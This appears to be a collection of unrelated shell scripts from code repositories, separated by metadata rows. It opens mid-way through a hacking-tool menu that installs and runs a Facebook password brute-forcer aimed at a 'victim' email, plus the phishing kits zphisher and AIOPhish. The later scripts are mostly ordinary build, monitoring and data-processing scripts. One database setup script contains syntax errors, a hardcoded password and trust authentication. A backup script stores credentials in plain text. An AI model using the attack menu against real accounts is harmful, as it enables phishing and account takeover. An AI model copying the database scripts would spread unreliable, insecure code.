git clone https://github.com/Antraxmx/Gross-FB.git
chmod 777 -R Gross-FB
limpiar_pantalla
cd Gross-FB
limpiar_pantalla
echo -e " \e[0;31m\e[5mCrackPress enter \e[0m"
echo -e " \e[0;34mIngresa correo dela victima"
read c
echo -e " \e[0;34mIngresa ruta de tu diccionario"
read d
perl gross.pl $c $d
done
read enterkey
;;
7)
function limpiar_pantalla {
clear
}
trap ctrl_c INT
function ctrl_c() {
echo -e "\e[0;31m SALIENDO DEL SCRIPT\e[0m"
sleep 2s
limpiar_pantalla
exit 0
bash Hacker-pc.sh
echo "volviendo al menu "
}
for Goodkiller in output
do
cd output
limpiar_pantalla
git clone https://github.com/FDX100/GOD-KILLER.git
chmod 777 -R GOD-KILLER
limpiar_pantalla
cd GOD-KILLER
chmod 777 -R install.py
python install.py "
y"
GOD-KILLER
done
read enterkey
;;
8)
trap ctrl_c INT
function ctrl_c() {
echo -e "\e[0;31m SALIENDO DEL SCRIPT\e[0m"
sleep 2s
limpiar_pantalla
exit 0
}
for Zphisher in output
do
function limpiar_pantalla {
clear
}
cd output
printf " INICIANDO INSTALACION DE REQUERIMENTOS " " "
apt install git curl php wget -y
printf "INSTALADAS CON EXITO"
limpiar_pantalla
git clone git://github.com/htr-tech/zphisher.git
chmod 777 -R zphisher
limpiar_pantalla
cd zphisher
bash zphisher.sh
done
read enterkey
;;
9)
trap ctrl_c INT
function ctrl_c() {
echo -e "\e[0;31m SALIENDO DEL SCRIPT\e[0m"
sleep 2s
limpiar_pantalla
exit 0
}
for AIOPhish in output
do
function limpiar_pantalla {
clear
}
cd output
limpiar_pantalla
git clone https://github.com/DeepSociety/AIOPhish
chmod 777 -R AIOPhish
limpiar_pantalla
cd AIOPhish
./aiophish
done
read enterkey
;;
10)
function hackingtool-pc {
cd HCK
bash HCK.sh
}
hackingtool-pc
read enterkey
;;
99)
clear
exit 0
read enterkey
;;
*) echo "la opcion no esta e n la lista"
read enterkey
;;
esac
done
| true
|
6d6e9ff7f3f0b77725e8320c42a5ae91db05ac0c
|
Shell
|
UVoggenberger/CEUAS
|
/CEUAS/public/harvest/code/download/odbgz.ksh
|
UTF-8
| 1,065
| 3.53125
| 4
|
[
"CC-BY-4.0",
"NetCDF"
] |
permissive
|
#!/bin/ksh
# -----------------------------------------------------------------------------
# This code has been developed in the service contract for C3S
#
# script for converting odb station files into gzipped ASCII format
#
# Limits for n should be adjusted depending on the server capacity
#
# (c) University of Vienna, L. Haimberger, Vienna, Austria
# Copernicus Climate Change Service, 2020
# https://apps.ecmwf.int/datasets/licences/copernicus/
# email leopold.haimberger (at) univie.ac.at
# Last Modifed: 23 January, 2020
# -----------------------------------------------------------------------------
for file in $(ls era5.*conv.* | grep -v '.nc'); do
echo $file
fil=$(echo $file | cut -c 1-14)
suff=$(echo $file | cut -c 16-23)
echo $fil,$suff
n=$(ps u | grep 'odb sql' | wc -l)
echo $n
rm ${fil}._$suff.gz
if [ ! -f ${fil}._$suff.gz ]; then
while [[ $n -gt 20 ]]; do
sleep 5
n=$(ps u | grep 'odb sql' | wc -l)
echo $n
done
time odb sql -q 'select *' -i ${file} | tr -d " " | gzip >${fil}._${suff}.gz &
fi
done
| true
|
6053742a402fdc1d00f19ed565e48931f3e07201
|
Shell
|
WALL-E/darts
|
/install.sh
|
UTF-8
| 183
| 2.65625
| 3
|
[] |
no_license
|
#!/bin/bash
role=`id -u`
if test $role -ne 0
then
echo "运行脚本需要root权限"
exit 1
fi
yum install -y nodejs
npm install -g jasmine
npm install --save-dev frisby
| true
|
d03deaac2766a9a798a3b3845fa185512b354a2c
|
Shell
|
MCalazans/crypto-infrastructure-demo
|
/mcalazans/dwarfs-forge/scripts/install-monitoring.sh
|
UTF-8
| 1,061
| 3.34375
| 3
|
[] |
no_license
|
#!/bin/bash
set -eu
PATH="/usr/sbin:/sbin:/usr/bin:/bin:/usr/local/bin"
CLOUDWATCH_MONITORING_SCRIPTS="CloudWatchMonitoringScripts-1.2.2.zip"
echo "**** Installing Monitoring Helpers"
# AWS specific configuration
echo "** Installing CloudWatch helper scripts"
echo "WARNING: This script will NOT add to crontab. You must add it using USERDATA."
[[ -d /opt/aws-scripts-mon ]] || {
# Install required tools for Amazon Linux
yum install -q -y perl-Switch perl-DateTime perl-Sys-Syslog perl-LWP-Protocol-https perl-Digest-SHA.x86_64
# Download and Install script
cd /opt
wget -q "http://aws-cloudwatch.s3.amazonaws.com/downloads/${CLOUDWATCH_MONITORING_SCRIPTS}"
unzip -q "${CLOUDWATCH_MONITORING_SCRIPTS}"
rm "${CLOUDWATCH_MONITORING_SCRIPTS}"
}
echo "** Downloading amazon ssm agent"
cd /tmp
curl -s https://amazon-ssm-us-east-1.s3.amazonaws.com/latest/linux_amd64/amazon-ssm-agent.rpm -o amazon-ssm-agent.rpm
yum remove -y -q amazon-ssm-agent
yum install -y -q amazon-ssm-agent.rpm
echo "** Installing CloudWatch Logs agent"
yum install -y -q awslogs
| true
|
a78dba4043357ebc74a009f99ad7d9e7116ca2ee
|
Shell
|
EL-R/EL-Repo
|
/guessinggame.sh
|
UTF-8
| 550
| 3.5625
| 4
|
[] |
no_license
|
echo "Welcome"
echo "Try to gess how many files contains this repository"
echo "Keep in mind it's not many))"
function A {
echo "Please type any number"
read res1
}
A
while [[ $res1 -ne 3 ]]
do
echo "You chose $res1"
if [[ $res1 -gt 10 ]]
then
echo "It's too mach value. I give a hint value not more than 10. Try again"
elif [[ $res1 -gt 3 ]]
then
echo "It's a big value. Try again"
else
echo "It's a small value. Try again"
fi
A
done
echo "You chose $res1"
echo "You are right! I have $res1 files in my repository."
| true
|
269f9e6a409f3d915c2a277d2b4d6f12d0d970f9
|
Shell
|
mananchhatriwala/hello-world
|
/Deployment/InitW1/TestInstallation/scripts/startservers.sh
|
UTF-8
| 5,079
| 3.015625
| 3
|
[] |
no_license
|
#!/bin/sh
# Is user specifies INSTALL_DB then create a new DB
# If user specifies DB_USER, then a user will be created
# DB_NAME
# DB_USER
# DB_PASS
# if the flag INSTALL_DB is specified and true
# install db
export DB_SCRIPT=/etc/postgresql/9.4/main/eam43a.sql
export PGPASSFILE=/etc/postgresql/9.4/main/.pgpass && \
if ! [ -f ${PGPASSFILE} ] ; then && \
touch ${PGPASSFILE} && \
fi && \
chmod 600 ${PGPASSFILE} && \
if [ -n ${INSTALL_DB} ] ; then && \
echo "host all all 0.0.0.0/0 trust" >> /etc/postgresql/9.4/main/pg_hba.conf && \
sed -i -- 's/md5/trust/g' /etc/postgresql/9.4/main/pg_hba.conf && \
sed -i -- 's/peer/trust/g' /etc/postgresql/9.4/main/pg_hba.conf && \
sed -i "/^#listen_addresses/i listen_addresses='*'" /etc/postgresql/9.4/main/postgresql.conf && \
su - postgres && \
export PGPASSWORD=p@ssw0rd && \
/etc/init.d/postgresql start && \
psql -U postgres -c "ALTER USER postgres WITH PASSWORD '${PGPASSWORD}';" && \
echo "*:*:*:postgres:${PGPASSWORD}" >> ${PGPASSFILE} && \
if [ -n ${DB_NAME} ] ; then && \
/usr/lib/postgresql/9.4/bin/createdb -h localhost -p 5432 -U postgres -D pg_default --no-password -T template1 -O postgres ${DB_NAME} && \
psql -U postgres -c "GRANT ALL ON DATABASE ${DB_NAME} TO postgres;" && \
/usr/lib/postgresql/9.4/bin/psql -U postgres "${DB_NAME}" < "${DB_SCRIPT}" && \
# /usr/lib/postgresql/9.4/bin/pg_restore --host localhost --port 5432 --username "postgres" --dbname "${DB_NAME}" --no-password --verbose /tmp/eam43a.backup
else
psql -U postgres -c "GRANT ALL ON DATABASE postgres TO postgres;" && \
/usr/lib/postgresql/9.4/bin/psql -U postgres "postgres" < "${DB_SCRIPT}" && \
# /usr/lib/postgresql/9.4/bin/pg_restore --host localhost --port 5432 --username "postgres" --dbname "postgres" --no-password --verbose /tmp/eam43a.backup
fi
if [ -n ${DB_USER} ] ; then && \
if [ -n ${DB_PASS} ] ; then && \
psql -U postgres -c "CREATE USER ${DB_USER} WITH PASSWORD '${DB_PASS}';" && \
export PGPASSWORD=${DB_PASS} && \
else
psql -U postgres -c "CREATE USER ${DB_USER} WITH PASSWORD '${DB_USER}';" && \
export PGPASSWORD=${DB_USER} && \
fi && \
psql -U postgres -c "GRANT ALL ON DATABASE ${DB_NAME} TO ${DB_USER};" && \
echo "*:*:*:${DB_USER}:${DB_PASS}" >> ${PGPASSFILE} && \
else
psql -U postgres -c "CREATE USER ${DB_NAME} WITH PASSWORD '${DB_NAME}';" && \
export PGPASSWORD=${DB_NAME} && \
fi && \
sed -i -- 's/trust/md5/g' /etc/postgresql/9.4/main/pg_hba.conf && \
/etc/init.d/postgresql restart && \
exit && \
fi && \
/opt/wildfly/bin/standalone.sh -b 0.0.0.0 -bmanagement 0.0.0.0
#
# start db
nohup su -c '/opt/rh/rh-postgresql94/root/usr/bin/postgres -D /var/lib/pgsql/data/data -c config_file=/var/lib/pgsql/data/data/postgresql.conf' - postgres &
# start server
nohup /opt/jboss-as-7.2.0.Final/bin/standalone.sh -Djboss.server.base.dir=IAREP -b 0.0.0.0 -c standalone.xml >/IAREP.log 2>&1 &
nohup /opt/jboss-as-7.2.0.Final/bin/standalone.sh -Djboss.server.base.dir=IAAPP -b 0.0.0.0 -c standalone.xml >/IAAPP.log 2>&1 &
sleep 2
# docker run -i -t -p 5432:5432 -p 8022:8022 -p 8042:8042 -p 8080:8080 --name ia -h "iahost" -v iadata:/var/lib/pgsql/data yugeshdocker1/wfpgpojowar
# Eureka Server 8761
# Eureka Client 1 9181
# Eureka Client 2 9182
# Web App Http 8080
# Zuul 9080
# Hystrix 8383
# JBoss monitoring 9990
# Tomcat monitoring 8009
# Postgres 5432
docker run -i -t -p 9181:9181 -p 9182:9182 -p 8080:8080 -p 9990:9990 -p 8009:8009 -p 5432:5432 -p 5433:5433 --name tc -v pg94config:/etc/postgresql -v pg94data:/var/lib/postgresql --name tc yugeshdocker1/postgres94tomcat8 /bin/bash
docker run -i -t -p 8761:8761 --name eureka tomcat:jre8 /bin/bash
docker run -i -t -p 9080:9080 --name zuul tomcat:jre8 /bin/bash
docker run -i -t -p 8383:8383 --name hystrix tomcat:jre8 /bin/bash
docker run -i -t -p 9181:9181 -p 8080:8080 -p 8009:8009 -p 5432:5432 --name tc -v pg94config:/etc/postgresql -v pg94data:/var/lib/postgresql --name tc yugeshdocker1/postgres94tomcat8 /bin/bash
docker run -i -t -p 8761:8761 --name eureka tomcat:jre8 /bin/bash
docker run --add-host eurekaclient1:192.168.99.100 --add-host eureka:192.168.99.100 --add-host hystrix:192.168.99.100 -i -t -p 9080:9080 -h zuul --name zuul1 yugeshdocker1/zuul /bin/bash
docker run --add-host eurekaclient1:192.168.99.100 --add-host eureka:192.168.99.100 -i -t -p 8383:8383 -h hystrix --name hystrix1 yugeshdocker1/hystrix catalina.sh start
docker run --add-host eurekaclient1:192.168.99.100 --add-host eureka:192.168.99.100 --add-host zuul:192.168.99.100 --add-host hystrix:192.168.99.100 -i -t -p 8761:8761 -h eureka --name eureka1 yugeshdocker1/eureka /bin/bash
docker run --add-host eurekaclient1:192.168.99.100 --add-host eureka:192.168.99.100 --add-host zuul:192.168.99.100 --add-host hystrix:192.168.99.100 -i -t -p 9181:9181 -p 8080:8080 -p 8009:8009 -p 5432:5432 -h eurekaclient1 --name tc -v pg94config:/etc/postgresql -v pg94data:/var/lib/postgresql --name tc yugeshdocker1/eurekaclient1 /bin/bash
| true
|
7daba34e9ea83ce8b3eb5fe46d6ec31500505764
|
Shell
|
aero31aero/bash-scripts
|
/runc
|
UTF-8
| 351
| 3.34375
| 3
|
[] |
no_license
|
#! /usr/bin/env bash
clear
SOURCE=$1.c
INPUT=$2
OUTPUT=$3
gcc $SOURCE
if [ $? -ne 0 ]; then
echo "Compilation Error! Please Debug!"
exit 1
fi
clear
echo "Compilation Successful!"
echo
echo "Program Input:"
echo "===================="
cat in
echo
echo "Program Output:"
echo "===================="
./a.out < $INPUT > $OUTPUT
cat $OUTPUT
echo
| true
|
313842b4d8c2f236fe91bd73cd5964ec239f6dff
|
Shell
|
jesse108/script_tools
|
/linux/db_backup.sh
|
UTF-8
| 371
| 2.84375
| 3
|
[] |
no_license
|
#!/bin/bash
# Mysql DB backup
# jesse_108@163.com
dateStr=`date "+%Y-%m-%d"`
year=`date "+%Y"`
month=`date "+%m"`
host="onlinein02.mysql.rds.aliyuncs.com"
db="db_name"
passwd="pwd"
username="username"
folder="/alidata/backup/backup/${year}/${month}"
mkdir -p $folder
fileName="${folder}/backup_${dateStr}.sql"
mysqldump -h${host} -u${username} -p${passwd} ${db} > $fileName
| true
|
25e1eff1035f55b1e885baf41fc4b62bd341acdb
|
Shell
|
limaia25/slicerDTIwithT1
|
/RegistrationFreeSurferDTIWithoutT2.sh
|
UTF-8
| 6,089
| 2.703125
| 3
|
[] |
no_license
|
#!/bin/bash
##script para gerar as tratografias das labels para aseg, e gera ficheiro fa, trace, prependicular e parralel difusitivity; ainda gera um labelmap com o corpo caloso (partes)
##versão sem imagem T2
##Version Slicer4.3
SlicerHome="/home/lapsi/Documentos/Slicer-4.3.0-linux-amd64"
FreeSurferHome="/usr/local/freesurfer"
DTIPrepHome="/home/lapsi/Documentos/extencoesSlicer/DTIPrep_1.1.6_linux64/"
estudo=$1
sujeito=$2
#mkdir $study/$sujeito
#estudo=$study/$sujeito
##convertToNrrd DTI - dicom diretory:$3 $SlicerHome/
##duas oportunidades: 1)com os DICOM 2)comFSL-NIFTI e depois 3)Phillips
##1)Dicom Siemens and Phillips
'/home/lapsi/Documentos/Slicer-4.3.0-linux-amd64/Slicer' --launch '/home/lapsi/Documentos/Slicer-4.3.0-linux-amd64/lib/Slicer-4.3/cli-modules/DWIConvert' --conversionMode DicomToNrrd --inputDicomDirectory $3 --outputVolume $estudo/dwi.nhdr
##2)FSL-NIFTI Siemens
#$SlicerHome'/Slicer' --launch $SlicerHome'/lib/Slicer-4.3/cli-modules/DWIConvert' --conversionMode FSLToNrrd --outputVolume $estudo/dwi.nhdr --inputVolume $estudo/*.nii --inputBVectors $estudo/*.bvec --inputBValues $estudo/*.bval
##3)Phillips, if not use the DWIconvert from DICOM
#'/home/lapsi/Documentos/Slicer-4.3.0-linux-amd64/Slicer' --launch '/home/lapsi/Documentos/Slicer-4.3.0-linux-amd64/lib/Slicer-4.3/cli-modules/DWIConvert' --conversionMode DicomToNrrd --inputDicomDirectory $4 --outputVolume $estudo/dwiBefore.nhdr
#unu crop -min 0 0 0 0 -max M M M M-1 -i input-dwi.nhdr -o output-dwi.nhdr
##correcao volumes DTI
$DTIPrepHome'/gtractCoregBvalues' --fixedVolume $estudo/dwi.nhdr --movingVolume $estudo/dwi.nhdr --outputVolume $estudo/dwi_ec.nhdr --eddyCurrentCorrection --maximumStepSize 0.1 --relaxationFactor 0.25 --outputTransform $estudo/ecTransform.tfm
##criar mask
$SlicerHome'/Slicer' --launch $SlicerHome'/lib/Slicer-4.3/cli-modules/DiffusionWeightedVolumeMasking' --removeislands $estudo/dwi_ec.nhdr $estudo/basedti.nhdr $estudo/mask.nrrd
##processardti
$SlicerHome'/Slicer' --launch $SlicerHome'/lib/Slicer-4.3/cli-modules/DWIToDTIEstimation' $estudo/dwi_ec.nhdr $estudo/dti.nhdr $estudo/basedti.nhdr -e WLS
##mask a imagem DTI
##$SlicerHome'/Slicer' --launch $SlicerHome'/lib/Slicer-4.3/cli-modules/MaskScalarVolume' $estudo/basedti.nhdr $estudo/mask.nrrd $estudo/base.nhdr
#converter aseg,brain com mri_convert (funcao do freeSurfer)
##
export FREESURFER_HOME=$FreeSurferHome
source $FREESURFER_HOME/SetUpFreeSurfer.sh
'/usr/local/freesurfer/bin/mri_convert' $FreeSurferHome/subjects/$sujeito/mri/brain.mgz $estudo/brain.nii.gz
'/usr/local/freesurfer/bin/mri_convert' $FreeSurferHome/subjects/$sujeito/mri/aseg.mgz $estudo/aseg.nii.gz
#'/usr/local/freesurfer/bin/mri_convert' $FreeSurferHome/subjects/$sujeito/mri/aparc.a2009s+aseg.mgz $estudo/aparc.a2009s+aseg.nii.gz
#coregisto (brainsfit, mask, brainsfit, resample)
$SlicerHome'/Slicer' --launch $SlicerHome'/lib/Slicer-4.3/cli-modules/BRAINSFit' --transformType ScaleSkewVersor3D,Affine --fixedVolume $estudo/basedti.nhdr --movingVolume $estudo/brain.nii.gz --outputTransform $estudo/transform1.tfm --outputVolume $estudo/t1DTIunmasked.nhdr --initializeTransformMode useCenterOfHeadAlign --interpolationMode Linear
$SlicerHome'/Slicer' --launch $SlicerHome'/lib/Slicer-4.3/cli-modules/BRAINSResample' --inputVolume $estudo/aseg.nii.gz --outputVolume $estudo/asegFinal.nhdr --warpTransform $estudo/transform1.tfm --referenceVolume $estudo/mask.nrrd --interpolationMode NearestNeighbor --pixelType int
#processar metricas
$SlicerHome'/Slicer' --launch $SlicerHome'/lib/Slicer-4.3/cli-modules/DiffusionTensorScalarMeasurements' $estudo/dti.nhdr $estudo/fa.nhdr -e FractionalAnisotropy
$SlicerHome'/Slicer' --launch $SlicerHome'/lib/Slicer-4.3/cli-modules/DiffusionTensorScalarMeasurements' $estudo/dti.nhdr $estudo/trace.nhdr -e Trace
$SlicerHome'/Slicer' --launch $SlicerHome'/lib/Slicer-4.3/cli-modules/DiffusionTensorScalarMeasurements' $estudo/dti.nhdr $estudo/pad.nhdr -e ParallelDiffusivity
$SlicerHome'/Slicer' --launch $SlicerHome'/lib/Slicer-4.3/cli-modules/DiffusionTensorScalarMeasurements' $estudo/dti.nhdr $estudo/ped.nhdr -e PerpendicularDiffusivity
#criar o cc
$SlicerHome'/Slicer' --launch $SlicerHome'/lib/Slicer-4.3/cli-modules/ThresholdScalarVolume' --thresholdtype Outside -l 251 -u 255 $estudo/asegFinal.nhdr $estudo/cc.nhdr
#processartractography $n>4 -> label numbers
i=1
for p in $*; do
if [ $i -gt 3 ]; then
$SlicerHome'/Slicer3' --launch $SlicerHome'/lib/Slicer3/Plugins/Seeding' $estudo/dti.nhdr $estudo/aseg$p.vtp -a $estudo/asegFinal.nhdr -s 1 -f FractionalAnisotropy -o $p
fi
let i=i+1
done
######old#################################################
#corregisto da lhOCC, rhOcc, aparc+aseg
##$SlicerHome'/Slicer3' --launch $SlicerHome'/lib/Slicer3/Plugins/ResampleVolume2' /usr/local/freesurfer/subjects/$sujeito/mri/lhoccipital.nii.gz $estudo/lhocc.nhdr -f $estudo/transform2.tfm -R $estudo/mask.nrrd --bulk --transform_order output-to-input -i nn
##$SlicerHome'/Slicer3' --launch $SlicerHome'/lib/Slicer3/Plugins/ResampleVolume2' /usr/local/freesurfer/subjects/$sujeito/mri/rhoccipital.nii.gz $estudo/rhocc.nhdr -f $estudo/transform2.tfm -R $estudo/mask.nrrd --bulk --transform_order output-to-input -i nn
##$SlicerHome'/Slicer3' --launch $SlicerHome'/lib/Slicer3/Plugins/ResampleVolume2' /usr/local/freesurfer/subjects/$sujeito/mri/aparc.a2009s+aseg.nii.gz $estudo/aparc.a2009s+aseg.nhdr -f $estudo/transform2.tfm -R $estudo/mask.nrrd --bulk --transform_order output-to-input -i nn
#All fiberbundle
##'/home/lapsi/Documentos/Slicer3-3.6.3-2011-03-04-linux-x86_64/Slicer3' --launch '/home/lapsi/Documentos/Slicer3-3.6.3-2011-03-04-linux-x86_64/lib/Slicer3/Plugins/Seeding' /usr/local/Estudos/EstudoOCD/Analise_DTI_OCD/ControloDICOM/ANJOS_ANTONIO_MIGUEL_NEVES_FERREIRA/lili/dti.nhdr /usr/local/Estudos/EstudoOCD/Analise_DTI_OCD/ControloDICOM/ANJOS_ANTONIO_MIGUEL_NEVES_FERREIRA/lili/mask.nrrd /usr/local/Estudos/EstudoOCD/Analise_DTI_OCD/ControloDICOM/ANJOS_ANTONIO_MIGUEL_NEVES_FERREIRA/lili/allFB.vtp -s 2 -f FractionalAnisotropy -o 1
| true
|
95bb69e2c9ee2ec118dbc780c341259372b05fd5
|
Shell
|
taiat/scripts
|
/public/aes-encrypt.sh
|
UTF-8
| 201
| 2.953125
| 3
|
[] |
no_license
|
#!/bin/bash
#Usage ./aes-decrypt.sh filename
echo "You are encrypting file: " $1 "."
echo "Write file output name: "
read name
echo "Type strong password!"
openssl enc -aes-256-cbc -in $1 -out $name
| true
|
694c99b03c699fd4083bb02079235093cb4774a5
|
Shell
|
w3bservice/linux
|
/sh/bitcoin.sh
|
UTF-8
| 1,200
| 3.421875
| 3
|
[] |
no_license
|
#!/bin/sh
BITCOIN_ROOT=/mnt/bitd
# Pick some path to install BDB to, here we create a directory within the bitcoin directory
BDB_PREFIX="${BITCOIN_ROOT}/db4"
mkdir -p $BDB_PREFIX
# Fetch the source and verify that it is not tampered with
wget 'http://download.oracle.com/berkeley-db/db-4.8.30.NC.tar.gz'
echo '12edc0df75bf9abd7f82f821795bcee50f42cb2e5f76a6a281b85732798364ef db-4.8.30.NC.tar.gz' | sha256sum -c
tar -xzvf db-4.8.30.NC.tar.gz
cd /mnt/bitd
wget https://sourceforge.net/projects/boost/files/boost/1.64.0/boost_1_64_0.tar.bz2/download -O boost_1_64_0.tar.bz2
tar jxvf boost_1_64_0.tar.bz2
cd boost_1_64_0
./bootstrap.sh
./b2 --prefix=/mnt/bitd/deps link=static runtime-link=static install
# Build the library and install to our prefix
cd db-4.8.30.NC/build_unix/
# Note: Do a static build so that it can be embedded into the executable, instead of having to find a .so at runtime
../dist/configure --enable-cxx --disable-shared --with-pic --prefix=$BDB_PREFIX
make install
# Configure Bitcoin Core to use our own-built instance of BDB
cd $BITCOIN_ROOT
./autogen.sh
./configure --prefix=$BITCOIN_ROOT --without-gui LDFLAGS="-L${BDB_PREFIX}/lib/" CPPFLAGS="-I${BDB_PREFIX}/include/"
| true
|
54d6cfa326da30b324f838a9d9b08ed0ba6fdcc8
|
Shell
|
pwr-kstasinski/Z03-24g
|
/Lab 2/Solutions/zadanie6.sh
|
UTF-8
| 415
| 3.203125
| 3
|
[] |
no_license
|
#!/bin/bash
echo -n "Sciezka: "
read path
counter(){
for file in "$1"/*
do
if [ -d "$file" ]
then
echo "$file"
counterhelp "$file" "$2"
fi
done
}
counterhelp(){
for file in "$1"/*
do
if [ -d "$file" ]
then
echo -n "$2"
echo "$file"
counterhelp "$file" "$2$2"
fi
done
}
counter "$path" "--"
read path
| true
|
4bf70fdbd3f91c6ddc7b3359eedd90fccfdbfbe1
|
Shell
|
mqwHub/kafka-client
|
/bin/start.sh
|
UTF-8
| 1,013
| 3.03125
| 3
|
[] |
no_license
|
!/bin/bash
cd `dirname $0`
BIN_DIR=`pwd`
cd ..
DEPLOY_DIR=`pwd`
CONF_DIR=$DEPLOY_DIR/conf
LIB_DIR=$DEPLOY_DIR/lib
LOGS_DIR=$DEPLOY_DIR/logs
LIB_JARS=`ls $LIB_DIR|grep .jar|awk '{print "'$LIB_DIR'/"$0}'|tr "\n" ":"`
CLASSPATH="$LIB_JARS:$CONF_DIR"
STDOUT_FILE=$LOGS_DIR/stdout.log
JAVA_MEM_OPTS=""
BITS=`java -version 2>&1 | grep -i 64-bit`
if [ -n "$BITS" ]; then
JAVA_MEM_OPTS=" -server
-Xmx2g
-Xms2g
-Xmn256m
-XX:PermSize=128m
-Xss256k
-XX:+PrintGCDetails
-Xloggc:$DEPLOY_DIR/gc.log
-XX:+HeapDumpOnOutOfMemoryError
-XX:HeapDumpPath=$DEPLOY_DIR "
else
JAVA_MEM_OPTS=" -server -Xms1g -Xmx1g -XX:PermSize=128m -XX:SurvivorRatio=2 -XX:+UseParallelGC "
fi
JAVA_JMX_OPTS=" -Dcom.sun.management.jmxremote.port=1099 -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false "
echo -e "Starting the service..."
nohup java $JAVA_MEM_OPTS $JAVA_JMX_OPTS -classpath $CLASSPATH zx.soft.kafka.demo.ConsumerGroupExample > $STDOUT_FILE 2>&1 &
| true
|
ef7b2c5b21216694c128b8ddc8b3a9f812e437b7
|
Shell
|
andrewmichael/igluctl
|
/.travis/deploy.sh
|
UTF-8
| 275
| 2.578125
| 3
|
[
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
#!/bin/bash
set -e
tag=$1
cd "${TRAVIS_BUILD_DIR}"
export TRAVIS_BUILD_RELEASE_TAG="${tag}"
release-manager \
--config "./.travis/release.yml" \
--check-version \
--make-version \
--make-artifact \
--upload-artifact
echo "DEPLOY: igluctl deployed..."
| true
|
65623b5fd2cd29c840a94d85ed99da5768bcb3a8
|
Shell
|
JING-XINXING/lmbio_test
|
/RUNP1
|
UTF-8
| 4,803
| 3.078125
| 3
|
[] |
no_license
|
#!/bin/bash
########################################################################################################
# Pipeline1: 蛋白分析流程头部,包括质谱原始数据读取、筛选、分析和绘图,简称P1
# Version: v2.6
# Date: 2019/12/30
# New:
# Usage: RUNP1
########################################################################################################
echo "RUNP1执行时间为:"
date
###################################################
## 1.参数
foldchange="1.5"
project_type="single_mark"
method="None"
project_path=`pwd` # 获取项目路径
unionplot_parameter="h" # 此参数为了绘制只有一个比较组的上下调图,默认参数是不绘制单个比较组的上下调图,需要绘制时就将参数设置为"g"即可
###################################################
## 2.新建项目分析目录
# SA 0
## 在目录1.dep内进行差异蛋白筛选
### 单组标记、Label free、磷酸化项目
echo ${project_path} # 打印项目路径
ls -RF ${project_path}/rawdata # 查看项目路径/rawdata/目录中的内容
cp ./rawdata/*.xlsx ./1.dep # 复制项目原始数据到目录/1.dep中
cp ./rawdata/*.txt ./1.dep # 针对于磷酸化项目的原始数据
### 多组标记项目数据
if find ${project_path}/rawdata/'TMT results 1'
then
echo "是TMT多组标记"
cp -r ${project_path}/rawdata/'TMT results 1' ./1.dep
cp -r ${project_path}/rawdata/'TMT results 2' ./1.dep
cp -r ${project_path}/rawdata/'TMT results 3' ./1.dep
elif find ${project_path}/rawdata/'iTRAQ results 1'
then
echo "是iTRAQ多组标记"
cp -r ${project_path}/rawdata/'iTRAQ results 1' ./1.dep
cp -r ${project_path}/rawdata/'iTRAQ results 2' ./1.dep
cp -r ${project_path}/rawdata/'iTRAQ results 3' ./1.dep
else
echo "不是TMT或iTRAQ多组标记项目"
fi
## 3.切换工作目录
cd ./1.dep
pwd
ls -RF ./
pwd
## 4.差异蛋白筛选
# condaoff
# source /public/hstore5/proteome/Personal_dir/jingxinxing/software/anaconda3/bin/deactivate
# source /public/hstore5/software/anaconda3/bin/activate # 激活公共anaconda3环境,执行prap3进行差异蛋白/位点筛选
export PATH=/public/hstore5/software/anaconda3/bin/:$PATH # 导入公共anaconda3环境的环境变量
### 单组数据和多组数据的差异蛋白筛选脚本不同,所以这里要判断之后再执行
#
if find ${project_path}/rawdata/'TMT results 1'
then
echo "是TMT多组标记"
prap3 -r ${foldchange} -f ${project_type} -e ${method} -i ${project_path}/1.dep
elif find ${project_path}/rawdata/'iTRAQ results 1'
then
echo "是iTRAQ多组标记"
prap3 -r ${foldchange} -f ${project_type} -e ${method} -i ${project_path}/1.dep
else
echo "不是TMT或iTRAQ多组标记项目"
prap3 -r ${foldchange} -f ${project_type} -e ${method}
fi
#
# prap3 -r ${foldchange} -f ${project_type} -e ${method}
## 5.绘制热图、韦恩图和火山图
# export PATH=/public/hstore5/list/prap/anaconda3/bin/:$PATH
unionplot2m -f ${foldchange}
sleep 3;
### 5.1如果是一个比较组就用下面的命令绘制上下调图
# runprap
source /public/hstore5/software/anaconda3/bin/activate prap # 进入prap环境
unionplot -$unionplot_parameter
source /public/hstore5/software/anaconda3/bin/deactivate prap # 退出prap环境
## 6.R绘图(自动判断项目类型,然后选择用对应的脚本:(iTRAQ,TMT,Label_free)runplo,(DIA)rundiap,(磷酸化项目Phosph)runphosp)
pwd=`pwd`
pwd2=`echo ${pwd:34}`
project_type=`echo ${pwd2%%/*}`
## 激活R绘图环境 ##
source /public/hstore5/proteome/Personal_dir/jingxinxing/software/anaconda3/bin/activate
### 1.项目类型:iTRAQ、TMT
# if [ ${project_type} -eq 'iTRAQ_TMT' ];
#
if [ ${project_type} == 'iTRAQ_TMT' ];
then
runplo
fi
#
### 2.项目类型:Label_free
# if [ ${project_type} -eq 'Label_free' ];
#
if [ ${project_type} == 'Label_free' ];
then
runplo
fi
#
### 3.项目类型:DIA
# DIA项目标志文件:数据质控文件.docx和DDA_library.xlsx
# if find ../rawdata/'DDA_library.xlsx' # DIA项目标志文件:数据质控文件.docx和DDA_library.xlsx
# then
# rundiap
# fi
# if [ ${project_type} -eq 'DIA' ];
#
if [ ${project_type} == 'DIA' ];
then
rundiap
fi
#
### 4.项目类型:Phosph
# if find ../rawdata/'Phospho (STY)Sites.txt'
# then
# runphosp
# fi
# if [ ${project_type} -eq 'phospho' ];
#
if [ ${project_type} == 'phospho' ];
then
runphosp
fi
#
### 5.项目类型:Phospho_DIA
#
if [ ${project_type} == 'Phospho_DIA' ];
then
runphos_dia
fi
#
### 6.项目类型:Acetyla_Labelfree
#
if [ ${project_type} == 'Acetyla_LF' ];
then
runacetlf
fi
#
echo
echo "恭喜你!蛋白项目分析流程第一阶段RUNP1(P1)——差异蛋白分析及R绘图完成!"
echo "可以进行下一阶段分析RUNP2(P2)——背景文件准备和富集分析"
date
| true
|
7ba4bc37732e879ae23865a75700e83740b23110
|
Shell
|
zoripong/word-way-backend
|
/install.sh
|
UTF-8
| 279
| 2.8125
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
set -e
if [[ "$VIRTUAL_ENV" = "" ]]; then
echo 'You seem not in any virtual environment.' \
'Please try after activate virtualenv.'
exit 1
fi
git config core.hooksPath "$PWD/git/hooks/"
pip install --upgrade pip
pip install -r dev-requirements.txt
| true
|
b399484731c3acc532814c126bf407c64eca69ac
|
Shell
|
